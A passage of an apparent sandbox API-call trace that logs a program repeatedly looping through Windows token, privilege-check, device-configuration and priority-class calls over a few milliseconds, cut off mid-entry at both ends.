0x3f0 [0084.805] GetCurrentProcess () returned 0xffffffff [0084.805] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.805] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.805] SetLastError (dwErrCode=0x522) [0084.805] CloseHandle (hObject=0x114) returned 1 [0084.805] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.805] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.806] GetLastError () returned 0x578 [0084.806] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.806] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.806] GetCurrentThread () returned 0xfffffffe [0084.806] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.806] GetLastError () returned 0x3f0 [0084.806] GetCurrentProcess () returned 0xffffffff [0084.806] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.806] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.806] SetLastError (dwErrCode=0x522) [0084.806] CloseHandle (hObject=0x114) returned 1 [0084.806] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.806] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.806] GetLastError () returned 0x578 [0084.806] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.806] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.806] GetCurrentThread () returned 0xfffffffe [0084.806] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.806] GetLastError () returned 0x3f0 [0084.806] GetCurrentProcess () returned 0xffffffff [0084.806] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.806] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.806] SetLastError (dwErrCode=0x522) [0084.806] CloseHandle (hObject=0x114) returned 1 [0084.806] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.806] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.806] GetLastError () returned 0x578 [0084.806] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.806] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.806] GetCurrentThread () returned 0xfffffffe [0084.806] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.806] GetLastError () returned 0x3f0 [0084.806] GetCurrentProcess () returned 0xffffffff [0084.806] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.806] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.806] SetLastError (dwErrCode=0x522) [0084.806] CloseHandle (hObject=0x114) returned 1 [0084.806] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.806] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.806] GetLastError () returned 0x578 [0084.806] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.806] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.806] GetCurrentThread () returned 0xfffffffe [0084.807] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.807] GetLastError () returned 0x3f0 [0084.807] GetCurrentProcess () returned 0xffffffff [0084.807] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.807] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.807] SetLastError (dwErrCode=0x522) [0084.807] CloseHandle (hObject=0x114) returned 1 [0084.807] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.807] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.807] GetLastError () returned 0x578 [0084.807] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.807] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.807] GetCurrentThread () returned 0xfffffffe [0084.807] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.807] GetLastError () returned 0x3f0 [0084.807] GetCurrentProcess () returned 0xffffffff [0084.807] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.807] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.807] SetLastError (dwErrCode=0x522) [0084.807] CloseHandle (hObject=0x114) returned 1 [0084.807] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.807] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.807] GetLastError () returned 0x578 [0084.807] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.807] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.807] GetCurrentThread () returned 0xfffffffe [0084.807] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.807] GetLastError () returned 0x3f0 [0084.807] GetCurrentProcess () returned 0xffffffff [0084.807] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.807] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.807] SetLastError (dwErrCode=0x522) [0084.807] CloseHandle (hObject=0x114) returned 1 [0084.807] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.807] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.807] GetLastError () returned 0x578 [0084.807] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.807] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.807] GetCurrentThread () returned 0xfffffffe [0084.807] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.807] GetLastError () returned 0x3f0 [0084.807] GetCurrentProcess () returned 0xffffffff [0084.807] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.808] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.808] SetLastError (dwErrCode=0x522) [0084.808] CloseHandle (hObject=0x114) returned 1 [0084.808] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.808] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.808] GetLastError () returned 0x578 [0084.808] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.808] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.808] GetCurrentThread () returned 0xfffffffe [0084.808] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.808] GetLastError () returned 0x3f0 [0084.808] GetCurrentProcess () returned 0xffffffff [0084.808] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.808] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.808] SetLastError (dwErrCode=0x522) [0084.808] CloseHandle (hObject=0x114) returned 1 [0084.808] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.808] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.808] GetLastError () returned 0x578 [0084.808] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.808] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.808] GetCurrentThread () returned 0xfffffffe [0084.808] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.808] GetLastError () returned 0x3f0 [0084.808] GetCurrentProcess () returned 0xffffffff [0084.808] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.808] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.808] SetLastError (dwErrCode=0x522) [0084.808] CloseHandle (hObject=0x114) returned 1 [0084.808] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.808] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.808] GetLastError () returned 0x578 [0084.808] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.808] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.808] GetCurrentThread () returned 0xfffffffe [0084.808] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.808] GetLastError () returned 0x3f0 [0084.808] GetCurrentProcess () returned 0xffffffff [0084.808] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.808] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.809] SetLastError (dwErrCode=0x522) [0084.809] CloseHandle (hObject=0x114) returned 1 [0084.809] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.809] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.809] GetLastError () returned 0x578 [0084.809] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.809] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.809] GetCurrentThread () returned 0xfffffffe [0084.809] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.809] GetLastError () returned 0x3f0 [0084.809] GetCurrentProcess () returned 0xffffffff [0084.809] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.809] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.809] SetLastError (dwErrCode=0x522) [0084.809] CloseHandle (hObject=0x114) returned 1 [0084.809] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.809] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.809] GetLastError () returned 0x578 [0084.809] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.809] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.809] GetCurrentThread () returned 0xfffffffe [0084.809] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.809] GetLastError () returned 0x3f0 [0084.809] GetCurrentProcess () returned 0xffffffff [0084.809] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.809] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.809] SetLastError (dwErrCode=0x522) [0084.809] CloseHandle (hObject=0x114) returned 1 [0084.809] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.809] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.809] GetLastError () returned 0x578 [0084.809] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.809] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.809] GetCurrentThread () returned 0xfffffffe [0084.809] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.809] GetLastError () returned 0x3f0 [0084.809] GetCurrentProcess () returned 0xffffffff [0084.809] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.809] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.809] SetLastError (dwErrCode=0x522) [0084.810] CloseHandle (hObject=0x114) returned 1 [0084.810] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.810] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.810] GetLastError () returned 0x578 [0084.810] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.810] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.810] GetCurrentThread () returned 0xfffffffe [0084.810] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.810] GetLastError () returned 0x3f0 [0084.810] GetCurrentProcess () returned 0xffffffff [0084.810] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.810] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.810] SetLastError (dwErrCode=0x522) [0084.810] CloseHandle (hObject=0x114) returned 1 [0084.810] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.810] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.810] GetLastError () returned 0x578 [0084.810] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.810] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.810] GetCurrentThread () returned 0xfffffffe [0084.810] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.810] GetLastError () returned 0x3f0 [0084.810] GetCurrentProcess () returned 0xffffffff [0084.810] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.810] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.810] SetLastError (dwErrCode=0x522) [0084.810] CloseHandle (hObject=0x114) returned 1 [0084.810] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.810] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.810] GetLastError () returned 0x578 [0084.810] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.810] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.810] GetCurrentThread () returned 0xfffffffe [0084.810] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.810] GetLastError () returned 0x3f0 [0084.810] GetCurrentProcess () returned 0xffffffff [0084.810] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.810] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.810] SetLastError (dwErrCode=0x522) [0084.810] CloseHandle (hObject=0x114) returned 1 [0084.811] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.811] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.811] GetLastError () returned 0x578 [0084.811] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.811] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.811] GetCurrentThread () returned 0xfffffffe [0084.811] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.811] GetLastError () returned 0x3f0 [0084.811] GetCurrentProcess () returned 0xffffffff [0084.811] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.811] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.811] SetLastError (dwErrCode=0x522) [0084.811] CloseHandle (hObject=0x114) returned 1 [0084.811] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.811] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.811] GetLastError () returned 0x578 [0084.811] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.811] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.811] GetCurrentThread () returned 0xfffffffe [0084.811] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.811] GetLastError () returned 0x3f0 [0084.811] GetCurrentProcess () returned 0xffffffff [0084.811] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.811] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.811] SetLastError (dwErrCode=0x522) [0084.811] CloseHandle (hObject=0x114) returned 1 [0084.811] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.811] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.811] GetLastError () returned 0x578 [0084.811] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.811] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.811] GetCurrentThread () returned 0xfffffffe [0084.811] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.811] GetLastError () returned 0x3f0 [0084.811] GetCurrentProcess () returned 0xffffffff [0084.811] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.811] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.811] SetLastError (dwErrCode=0x522) [0084.811] CloseHandle (hObject=0x114) returned 1 [0084.812] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.812] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.812] GetLastError () returned 0x578 [0084.812] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.812] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.812] GetCurrentThread () returned 0xfffffffe [0084.812] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.812] GetLastError () returned 0x3f0 [0084.812] GetCurrentProcess () returned 0xffffffff [0084.812] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.812] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.812] SetLastError (dwErrCode=0x522) [0084.812] CloseHandle (hObject=0x114) returned 1 [0084.812] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.812] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.812] GetLastError () returned 0x578 [0084.812] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.812] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.812] GetCurrentThread () returned 0xfffffffe [0084.812] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.812] GetLastError () returned 0x3f0 [0084.812] GetCurrentProcess () returned 0xffffffff [0084.812] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.812] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.812] SetLastError (dwErrCode=0x522) [0084.812] CloseHandle (hObject=0x114) returned 1 [0084.812] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.812] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.812] GetLastError () returned 0x578 [0084.812] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.812] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.812] GetCurrentThread () returned 0xfffffffe [0084.812] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: 